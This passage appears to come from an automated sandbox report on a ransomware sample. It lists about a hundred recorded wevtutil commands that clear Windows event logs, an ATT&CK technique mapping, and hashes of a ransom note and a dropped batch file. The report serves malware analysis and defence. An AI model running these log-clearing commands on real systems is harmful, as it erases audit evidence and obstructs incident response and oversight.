C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Maintenance"
2⤵
PID:4312

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Operational"
2⤵
PID:284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TaskbarCPL/Diagnostic"
2⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
2⤵
PID:1404

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
2⤵
PID:3644

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
2⤵
PID:3756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
2⤵
PID:276

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
2⤵
PID:3076

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
2⤵
PID:2308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
2⤵
PID:2084

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
2⤵
PID:3724

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
2⤵
PID:2364

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
2⤵
PID:4680

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
2⤵
PID:2664

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
2⤵
PID:3400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
2⤵
PID:4704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-Printers/Admin"
2⤵
PID:2516

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-Printers/Analytic"
2⤵
PID:4744

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-Printers/Debug"
2⤵
PID:3688

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-Printers/Operational"
2⤵
PID:1996

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
2⤵
PID:832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Debug"
2⤵
PID:4728

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Operational"
2⤵
PID:1796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
2⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
2⤵
PID:4780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
2⤵
PID:3272

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
2⤵
PID:4396

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
2⤵
PID:680

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
2⤵
PID:4252

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
2⤵
PID:4340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
2⤵
PID:1500

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
2⤵
PID:4900

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
2⤵
PID:3780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Tethering-Manager/Analytic"
2⤵
- Clears Windows event logs
PID:5048

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Tethering-Station/Analytic"
2⤵
- Clears Windows event logs
PID:2628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ThemeUI/Diagnostic"
2⤵
PID:612

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ThemeCPL/Diagnostic"
2⤵
PID:4508

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Threat-Intelligence/Analytic"
2⤵
PID:4624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Time-Service-PTP-Provider/PTP-Operational"
2⤵
- Clears Windows event logs
PID:4240

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Time-Service/Operational"
2⤵
PID:3940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Troubleshooting-Recommended/Admin"
2⤵
PID:116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Troubleshooting-Recommended/Operational"
2⤵
PID:3260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-TunnelDriver"
2⤵
- Clears Windows event logs
PID:3460

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UAC-FileVirtualization/Operational"
2⤵
PID:1172

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UAC/Operational"
2⤵
PID:3344

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UI-Shell/Diagnostic"
2⤵
PID:4756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAnimation/Diagnostic"
2⤵
PID:4392

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Debug"
2⤵
PID:404

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Diagnostic"
2⤵
PID:4576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Perf"
2⤵
PID:3840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UIRibbon/Diagnostic"
2⤵
PID:2788

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-MAUSBHOST-Analytic"
2⤵
PID:3728

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-UCX-Analytic"
2⤵
PID:4792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-USBHUB/Diagnostic"
2⤵
PID:4600

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-USBHUB3-Analytic"
2⤵
PID:4800

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-USBPORT/Diagnostic"
2⤵
PID:904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-USBXHCI-Analytic"
2⤵
- Clears Windows event logs
PID:3652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-USB-USBXHCI-Trustlet-Analytic"
2⤵
PID:4024

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UniversalTelemetryClient/Operational"
2⤵
PID:2460

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Control Panel Performance/Diagnostic"
2⤵
PID:1004

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Control Panel Usage/Diagnostic"
2⤵
PID:1780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Control Panel/Diagnostic"
2⤵
PID:4588

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Control Panel/Operational"
2⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Device Registration/Admin"
2⤵
PID:5044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Device Registration/Debug"
2⤵
PID:2020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Profile Service/Diagnostic"
2⤵
PID:2208

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User Profile Service/Operational"
2⤵
PID:2796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User-Loader/Analytic"
2⤵
PID:4244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-User-Loader/Operational"
2⤵
PID:2032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserAccountControl/Diagnostic"
2⤵
PID:4488

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserModePowerService/Diagnostic"
2⤵
PID:2972

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/ActionCenter"
2⤵
PID:4036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceInstall"
2⤵
PID:1476

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
2⤵
PID:2672

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/Performance"
2⤵
PID:4928

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UserPnp/SchedulerOperations"
2⤵
PID:436

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UxInit/Diagnostic"
2⤵
PID:2116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-UxTheme/Diagnostic"
2⤵
PID:5076

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VAN/Diagnostic"
2⤵
PID:1232

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VDRVROOT/Operational"
2⤵
PID:232

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VHDMP-Analytic"
2⤵
PID:1156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VHDMP-Operational"
2⤵
PID:3328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VIRTDISK-Analytic"
2⤵
PID:4160

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VPN-Client/Operational"
2⤵
PID:1084

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VPN/Operational"
2⤵
PID:2604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VWiFi/Diagnostic"
2⤵
PID:220

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VerifyHardwareSecurity/Admin"
2⤵
- Clears Windows event logs
PID:3468

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VerifyHardwareSecurity/Operational"
2⤵
- Clears Windows event logs
PID:3852

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Volume/Diagnostic"
2⤵
PID:4912

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VolumeControl/Performance"
2⤵
PID:2324

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VolumeSnapshot-Driver/Analytic"
2⤵
PID:4248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
2⤵
PID:1312

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WABSyncProvider/Analytic"
2⤵
PID:4992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
2⤵
PID:4752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WCNWiz/Analytic"
2⤵
PID:1316

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WEPHOSTSVC/Operational"
2⤵
PID:3832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WER-PayloadHealth/Operational"
2⤵
PID:4904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WFP/Analytic"
2⤵
PID:2660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WFP/Operational"
2⤵
PID:2044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLAN-AutoConfig/Operational"
2⤵
PID:1380

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
2⤵
PID:1792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLAN-Driver/Analytic"
2⤵
PID:4592

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLAN-MediaManager/Diagnostic"
2⤵
PID:3872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
2⤵
- Clears Windows event logs
PID:4428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMI-Activity/Debug"
2⤵
PID:5088

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMI-Activity/Operational"
2⤵
PID:3296

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMI-Activity/Trace"
2⤵
PID:548

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMPDMCUI/Diagnostic"
2⤵
PID:3140

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
2⤵
PID:4608

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2752

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Indicator Removal on Host

1

T1070

File Deletion

2

T1107

Impair Defenses

1

T1562

Credential Access

Discovery

Query Registry

2

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\HOW TO RESTORE YOUR TCVJUO FILES.TXT
Filesize
1KB

MD5
f605cb189b27e5dbc73021da482f7398

SHA1
cf525d2a6525841e2c30123a530fca43b0384895

SHA256
77f65b1e9b00ff35c43eac0caf82ad918a857e8ec6b6807c18ba5e47ada5aa0c

SHA512
2d386e2ee2acc9d8241daeaa26743c0554e3bdc76b819cd7d2a5fcef78579bfda0916cd2f737d076965542a0074923f319214ecd260c24314ea1282eb59e477c

Download Submit
\??\c:\windows\temp\liyd.bat
Filesize
11KB

MD5
9ef680eda0e357dfcdfe9a7ddcd33514

SHA1
33a5a77eb9bb3be27b37fb8645fbe946b3f5f4ed

SHA256
dc98394f1189fd8ae45eec6e7302993b0cc2da4ab8855503ca6d76ed59b17692

SHA512
e3b3e595d760c13d5509ca8e621dc8bec36d705199effcc60b1c854d0f6ce17bc1eab26ea5704dba1d34a4e35c401cf22917deb088fce1e32403878ebc690293

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads